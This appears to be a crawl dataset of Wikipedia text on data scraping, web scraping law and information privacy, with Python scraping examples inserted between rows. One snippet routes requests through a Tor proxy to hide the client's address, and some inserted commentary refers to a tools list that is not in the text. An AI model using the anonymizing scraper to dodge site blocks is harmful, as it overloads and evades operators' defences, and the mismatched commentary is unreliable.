16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200-300 search requests to QVC's website per minute, sometimes up to 36,000 requests per minute), which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. On the plaintiff's web site during the period of this trial, the terms-of-use link was displayed among all the links of the site, at the bottom of the page, as on most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor of common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned it to the Ninth Circuit to reconsider in light of the 2021 Supreme Court decision in Van Buren v. United States, which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld its prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court for the Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping will be a violation of contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
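The tools list in the record above names BeautifulSoup as the simplest entry point for pulling data out of HTML. As a minimal, hedged sketch of that approach (not the pipeline used elsewhere in this document), the following Python snippet fetches a single page and lists its links; https://example.com is a placeholder target, and any real target should first be checked against its robots.txt and terms of use.

import requests
from bs4 import BeautifulSoup

def scrape_links(url):
    # Fetch the page; a descriptive User-Agent and a timeout are basic good practice
    response = requests.get(url, headers={"User-Agent": "research-scraper-example"}, timeout=10)
    response.raise_for_status()
    # Parse the HTML and pull out every anchor's visible text and href attribute
    soup = BeautifulSoup(response.text, "html.parser")
    return [(a.get_text(strip=True), a.get("href")) for a in soup.find_all("a", href=True)]

for text, href in scrape_links("https://example.com"):
    print(text, "->", href)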
678 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#References | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. 
Computer-to-user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today, for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50-year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management—could be said to be an example of robotic process automation software, called RPA, or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24×80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data into numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally, Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX/VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or, for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined, in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 
7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
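Report mining, as described at the end of the record above, works on static human-readable output rather than on a live interface. The sketch below is an assumption-laden illustration: it parses a hypothetical printer-style report, with an ID, a name, and an amount per line, into a pandas DataFrame; the column layout and sample values are invented for the example.

import re
import pandas as pd

# A hypothetical report, as it might look after being redirected to a spool file
REPORT = """\
ID    NAME            AMOUNT
0001  ACME SUPPLY       125.50
0002  GLOBEX CORP      1300.00
"""

def mine_report(text):
    rows = []
    for line in text.splitlines():
        # Keep only lines that look like data rows: a 4-digit ID, a name, and a decimal amount
        match = re.match(r"^(\d{4})\s+(.+?)\s+([\d,]+\.\d{2})$", line)
        if match:
            rows.append({"id": match.group(1),
                         "name": match.group(2).strip(),
                         "amount": float(match.group(3).replace(",", ""))})
    return pd.DataFrame(rows)

print(mine_report(REPORT))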
679 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Special:RecentChanges | This is a list of recent changes to Wikipedia. |
680 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#Web_Scraping_Platforms | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
|
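The techniques described in the record above mention parsing a page into a DOM tree and using XPath to pull fields out of template-generated pages. The following sketch shows that idea with the lxml library; the embedded HTML snippet and the product/price structure are assumptions made up for illustration, and lxml is assumed to be installed.

from lxml import html

# Assumed template-generated HTML, as a common script might render it from a database
PAGE = """
<html><body>
  <div class="product"><h2>Widget A</h2><span class="price">$9.99</span></div>
  <div class="product"><h2>Widget B</h2><span class="price">$14.50</span></div>
</body></html>
"""

tree = html.fromstring(PAGE)
# An absolute XPath selects each product node; relative XPaths then read fields out of it
for node in tree.xpath("//div[@class='product']"):
    name = node.xpath("./h2/text()")[0]
    price = node.xpath("./span[@class='price']/text()")[0]
    print(name, price)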
681 | https://en.wikipedia.org/wiki/Data_scraping | https://hdl.handle.net/1822%2F32460 | Contact us. RepositóriUM statistics. Universidade do Minho. Copyright 2014. |
682 | https://en.wikipedia.org/wiki/Data_scraping | https://wikimediafoundation.org/ | The nonprofit Wikimedia Foundation provides the essential infrastructure for free knowledge. We host Wikipedia, the free online encyclopedia, created, edited, and verified by volunteers around the world, as well as many other vital community projects. All of which is made possible thanks to donations from individuals like you. We welcome anyone who shares our vision to join us in collecting and sharing knowledge that fully represents human diversity. Protect and sustain Wikipedia Donations are secure 1 You made it. It is yours to use. For free. That means you can use it, adapt it, or share what you find on Wikimedia sites. Just do not write your own bio, or copy paste it into your homework. 2 We do not sell your email address or any of your personal information to third parties. More information about our privacy practices are available at the Wikimedia Foundation privacy policy, donor privacy policy, and data retention guidelines. 3 Readers verify the facts. Articles are collaboratively created and edited by a community of volunteers using reliable sources, so no single person or company owns a Wikipedia article. The Wikimedia Foundation does not write or edit, but you and everyone you know can help. 4 The word “wiki” refers to a website built using collaborative editing software. Projects with no past or existing affiliation with Wikipedia or the Wikimedia Foundation, such as Wikileaks and wikiHow, also use the term. Although these sites also use “wiki” in their name, they have nothing to do with Wikimedia. 280,000 editors contribute to Wikimedia projects every month 100 million media files on Wikimedia Commons and counting 1.5 billion unique devices access Wikimedia projects every month We conduct our own research and partner with researchers worldwide to address change in society and technology. From site reliability to machine learning, our open-source technology makes Wikipedia faster, more reliable, and more accessible worldwide. We fight to protect everyone’s right to access free and open knowledge. Our volunteers build tools, share photos, write articles, and are working to connect all the knowledge that exists. Free encyclopedia written in over 300 languages by volunteers around the world. The world’s largest free-to-use-library of illustrations, photos, drawings, videos and music. The nineteenth edition of the global event will take place in Katowice, Poland (the 2024 European City of Science), from 7 10 August. The Foundation supports challenges to laws in Texas and Florida that jeopardize Wikipedia’s community-led governance model and the right to freedom of expression. Throughout history, knowledge has been controlled by a powerful few. Wikipedia needs knowledge from all languages and cultures. The internet has become the default for accessing information—women, people of color, and the global south remain underrepresented. We invite you to help correct history. As a nonprofit, Wikipedia and our related free knowledge projects are powered primarily through donations. 
The Wikimedia Foundation, Inc. is a nonprofit charitable organization dedicated to encouraging the growth, development and distribution of free, multilingual content, and to providing the full content of these wiki-based projects to the public free of charge. |
683 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Information_privacy | Information privacy is the relationship between the collection and dissemination of data, technology, the public expectation of privacy, contextual information norms, and the legal and political issues surrounding them. 1 It is also known as data privacy 2 or data protection. Various types of personal information often come under privacy concerns. This describes the ability to control what information one reveals about oneself over cable television, and who can access that information. For example, third parties can track IP TV programs someone has watched at any given time. "The addition of any information in a broadcasting stream is not required for an audience rating survey, additional devices are not requested to be installed in the houses of viewers or listeners, and without the necessity of their cooperations, audience ratings can be automatically performed in real-time. 3 In the United Kingdom in 2012, the Education Secretary Michael Gove described the National Pupil Database as a "rich dataset" whose value could be "maximised" by making it more openly accessible, including to private companies. Kelly Fiveash of The Register said that this could mean "a child's school life including exam results, attendance, teacher assessments and even characteristics" could be available, with third-party organizations being responsible for anonymizing any publications themselves, rather than the data being anonymized by the government before being handed over. An example of a data request that Gove indicated had been rejected in the past, but might be possible under an improved version of privacy regulations, was for "analysis on sexual exploitation". 4 Information about a person's financial transactions, including the amount of assets, positions held in stocks or funds, outstanding debts, and purchases can be sensitive. If criminals gain access to information such as a person's accounts or credit card numbers, that person could become the victim of fraud or identity theft. Information about a person's purchases can reveal a great deal about that person's history, such as places they have visited, whom they have contact with, products they have used, their activities and habits, or medications they have used. In some cases, corporations may use this information to target individuals with marketing customized towards those individual's personal preferences, which that person may or may not approve. 4 As heterogeneous information systems with differing privacy rules are interconnected and information is shared, policy appliances will be required to reconcile, enforce, and monitor an increasing amount of privacy policy rules (and laws). There are two categories of technology to address privacy protection in commercial IT systems: communication and enforcement. Computer privacy can be improved through individualization. Currently security messages are designed for the "average user", i.e. the same message for everyone. Researchers have posited that individualized messages and security "nudges", crafted based on users' individual differences and personality traits, can be used for further improvements for each person's compliance with computer security and privacy. 5 The ability to control the information one reveals about oneself over the internet and who can access that information has become a growing concern. 
These concerns include whether email can be stored or read by third parties without consent or whether third parties can continue to track the websites that someone visited. Another concern is whether websites one visits can collect, store, and possibly share personally identifiable information about users. The advent of various search engines and the use of data mining created a capability for data about individuals to be collected and combined from a wide variety of sources very easily. 6 7 8 AI facilitated creating inferential information about individuals and groups based on such enormous amounts of collected data, transforming the information economy. 9 The FTC has provided a set of guidelines that represent widely accepted concepts concerning fair information practices in an electronic marketplace, called the Fair Information Practice Principles. But these have been critiqued for their insufficiency in the context of AI-enabled inferential information. 10 On the internet many users give away a lot of information about themselves: unencrypted e-mails can be read by the administrators of an e-mail server if the connection is not encrypted (no HTTPS), and also the internet service provider and other parties sniffing the network traffic of that connection are able to know the contents. The same applies to any kind of traffic generated on the Internet, including web browsing, instant messaging, and others. In order not to give away too much personal information, e-mails can be encrypted and browsing of webpages as well as other online activities can be done traceless via anonymizers, or by open source distributed anonymizers, so-called mix networks. Well-known open-source mix nets include I2P The Anonymous Network and Tor. 11 Email is not the only internet content with privacy concerns. In an age where increasing amounts of information are online, social networking sites pose additional privacy challenges. People may be tagged in photos or have valuable information exposed about themselves either by choice or unexpectedly by others, referred to as participatory surveillance. Data about location can also be accidentally published, for example, when someone posts a picture with a store as a background. Caution should be exercised when posting information online. Social networks vary in what they allow users to make private and what remains publicly accessible. 12 Without strong security settings in place and careful attention to what remains public, a person can be profiled by searching for and collecting disparate pieces of information, leading to cases of cyberstalking 13 or reputation damage. 14 Cookies are used on websites so that users may allow the website to retrieve some information from the user's internet, but they usually do not mention what the data being retrieved is. 15 In 2018, the General Data Protection Regulation (GDPR) passed a regulation that forces websites to visibly disclose to consumers their information privacy practices, referred to as cookie notices. 15 This was issued to give consumers the choice of what information about their behavior they consent to letting websites track; however, its effectiveness is controversial. 15 Some websites may engage in deceptive practices such as placing cookie notices in places on the page that are not visible or only giving consumers notice that their information is being tracked but not allowing them to change their privacy settings. 
15 Apps like Instagram and Facebook collect user data for a personalized app experience; however, they track user activity on other apps, which jeopardizes users' privacy and data. By controlling how visible these cookie notices are, companies can discreetly collect data, giving them more power over consumers. 15 As location tracking capabilities of mobile devices are advancing (location-based services), problems related to user privacy arise. Location data is among the most sensitive data currently being collected. 16 A list of potentially sensitive professional and personal information that could be inferred about an individual knowing only their mobility trace was published in 2009 by the Electronic Frontier Foundation. 17 These include the movements of a competitor sales force, attendance of a particular church or an individual's presence in a motel, or at an abortion clinic. A recent MIT study 18 19 by de Montjoye et al. showed that four spatio-temporal points, approximate places and times, are enough to uniquely identify 95% of 1.5 million people in a mobility database. The study further shows that these constraints hold even when the resolution of the dataset is low. Therefore, even coarse or blurred datasets provide little anonymity. People may not wish for their medical records to be revealed to others due to the confidentiality and sensitivity of what the information could reveal about their health. For example, they might be concerned that it might affect their insurance coverage or employment. Or, it may be because they would not wish for others to know about any medical or psychological conditions or treatments that would bring embarrassment upon themselves. Revealing medical data could also reveal other details about one's personal life. 20 There are three major categories of medical privacy: informational (the degree of control over personal information), physical (the degree of physical inaccessibility to others), and psychological (the extent to which the doctor respects patients' cultural beliefs, inner thoughts, values, feelings, and religious practices and allows them to make personal decisions). 21 Physicians and psychiatrists in many cultures and countries have standards for doctor patient relationships, which include maintaining confidentiality. In some cases, the physician patient privilege is legally protected. These practices are in place to protect the dignity of patients, and to ensure that patients feel free to reveal complete and accurate information required for them to receive the correct treatment. 22 To view the United States' laws on governing privacy of private health information, see HIPAA and the HITECH Act. The Australian law is the Privacy Act 1988 Australia as well as state-based health records legislation. Political privacy has been a concern since voting systems emerged in ancient times. The secret ballot is the simplest and most widespread measure to ensure that political views are not known to anyone other than the voters themselves—it is nearly universal in modern democracy and considered to be a basic right of citizenship. In fact, even where other rights of privacy do not exist, this type of privacy very often does. There are several forms of voting fraud or privacy violations possible with the use of digital voting machines. 23 The legal protection of the right to privacy in general and of data privacy in particular varies greatly around the world. 
24 Laws and regulations related to Privacy and Data Protection are constantly changing; it is seen as important to keep abreast of any changes in the law and to continually reassess compliance with data privacy and security regulations. 25 Within academia, Institutional Review Boards function to assure that adequate measures are taken to ensure both the privacy and confidentiality of human subjects in research. 26 Privacy concerns exist wherever personally identifiable information or other sensitive information is collected, stored, used, and finally destroyed or deleted in digital form or otherwise. Improper or non-existent disclosure control can be the root cause for privacy issues. Informed consent mechanisms including dynamic consent are important in communicating to data subjects the different uses of their personally identifiable information. Data privacy issues may arise in response to information from a wide range of sources, such as: 27 The United States Department of Commerce created the International Safe Harbor Privacy Principles certification program in response to the 1995 Directive on Data Protection (Directive 95/46/EC) of the European Commission. 31 Both the United States and the European Union officially state that they are committed to upholding information privacy of individuals, but the former has caused friction between the two by failing to meet the standards of the EU's stricter laws on personal data. The negotiation of the Safe Harbor program was, in part, to address this long-running issue. 32 Directive 95/46/EC declares in Chapter IV Article 25 that personal data may only be transferred from the countries in the European Economic Area to countries which provide adequate privacy protection. Historically, establishing adequacy required the creation of national laws broadly equivalent to those implemented by Directive 95/46/EU. Although there are exceptions to this blanket prohibition, for example where the disclosure to a country outside the EEA is made with the consent of the relevant individual (Article 26(1)(a)), they are limited in practical scope. As a result, Article 25 created a legal risk to organizations which transfer personal data from Europe to the United States. The program regulates the exchange of passenger name record information between the EU and the US. According to the EU directive, personal data may only be transferred to third countries if that country provides an adequate level of protection. Some exceptions to this rule are provided, for instance when the controller themself can guarantee that the recipient will comply with the data protection rules. The European Commission has set up the "Working Party on the Protection of Individuals with regard to the Processing of Personal Data", commonly known as the "Article 29 Working Party". The Working Party gives advice about the level of protection in the European Union and third countries. 33 The Working Party negotiated with U.S. representatives about the protection of personal data; the Safe Harbor Principles were the result. Notwithstanding that approval, the self-assessment approach of the Safe Harbor remains controversial with a number of European privacy regulators and commentators. 34 The Safe Harbor program addresses this issue in the following way: rather than a blanket law imposed on all organizations in the United States, a voluntary program is enforced by the Federal Trade Commission. U.S. 
organizations which register with this program, having self-assessed their compliance with a number of standards, are "deemed adequate" for the purposes of Article 25. Personal information can be sent to such organizations from the EEA without the sender being in breach of Article 25 or its EU national equivalents. The Safe Harbor was approved as providing adequate protection for personal data, for the purposes of Article 25(6), by the European Commission on 26 July 2000. 35 Under the Safe Harbor, adoptee organizations need to carefully consider their compliance with the onward transfer obligations, where personal data originating in the EU is transferred to the US Safe Harbor, and then onward to a third country. The alternative compliance approach of "binding corporate rules", recommended by many EU privacy regulators, resolves this issue. In addition, any dispute arising in relation to the transfer of HR data to the US Safe Harbor must be heard by a panel of EU privacy regulators. 36 In July 2007, a new, controversial, 37 Passenger Name Record agreement between the US and the EU was made. 38 A short time afterwards, the Bush administration gave exemption for the Department of Homeland Security, for the Arrival and Departure Information System (ADIS) and for the Automated Target System from the 1974 Privacy Act. 39 In February 2008, Jonathan Faull, the head of the EU's Commission of Home Affairs, complained about the US bilateral policy concerning PNR. 40 The US had signed in February 2008 a memorandum of understanding (MOU) with the Czech Republic in exchange of a visa waiver scheme, without concerting before with Brussels. 37 The tensions between Washington and Brussels are mainly caused by a lesser level of data protection in the US, especially since foreigners do not benefit from the US Privacy Act of 1974. Other countries approached for bilateral MOU included the United Kingdom, Estonia, Germany and Greece. 41 |
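The privacy record above notes that web traffic can be routed through anonymizers and mix networks such as Tor so that activity is not tied directly to the client's own address. One common pattern, sketched below under stated assumptions, is to point an HTTP client at a locally running Tor SOCKS proxy: it assumes a Tor daemon is already listening on 127.0.0.1:9050 and that requests was installed with SOCKS support (for example via requests[socks]).

import requests

# Assumes a local Tor daemon exposing a SOCKS5 proxy on its default port 9050
TOR_PROXIES = {
    "http": "socks5h://127.0.0.1:9050",
    "https": "socks5h://127.0.0.1:9050",
}

def get_via_tor(url):
    # socks5h also resolves DNS through the proxy, so hostname lookups are not leaked locally
    response = requests.get(url, proxies=TOR_PROXIES, timeout=30)
    response.raise_for_status()
    return response.text

# Should print the Tor exit node's address rather than the local one
print(get_via_tor("https://ifconfig.me").strip())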
684 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Special:QrCode&url=https%3A%2F%2Fen.wikipedia.org%2Fwiki%2FWeb_scraping | The IP address or range 180.190.0.0/16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0/16 has been globally blocked for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards@wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Return to Main Page. |
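The block notice captured in the record above is the kind of response an aggressive crawler eventually receives: wikis and many other sites rate-limit and range-block clients that send too many requests. As a hedged sketch only (the marker phrases, delays, and status codes are illustrative assumptions, not Wikipedia's actual configuration), a politer request loop can space out requests, back off on HTTP 429/503 responses, and stop when it detects a block page.

import time
import requests

BLOCK_MARKERS = ("has been blocked", "globally blocked")  # illustrative phrases only

def polite_get(url, max_retries=3, base_delay=5):
    for attempt in range(max_retries):
        response = requests.get(url, headers={"User-Agent": "research-scraper-example"}, timeout=15)
        if response.status_code in (429, 503):
            # Back off exponentially when the server signals it is overloaded or rate-limiting
            time.sleep(base_delay * (2 ** attempt))
            continue
        if any(marker in response.text for marker in BLOCK_MARKERS):
            raise RuntimeError("Block page detected; stop crawling this host")
        return response.text
    raise RuntimeError("Giving up after repeated rate-limit responses")

# Usage: fetch URLs one at a time, pausing between requests
# for url in urls:
#     page = polite_get(url)
#     time.sleep(2)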
685 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Category:CS1_Danish-language_sources_(da) | This is a tracking category for CS1 citations that use the parameter language da to identify a source in Danish. Pages in this category should only be added by CS1 templates and Module:Citation CS1. The following 200 pages are in this category, out of approximately 17,294 total. This list may not reflect recent changes. The following 3 files are in this category, out of 3 total. |
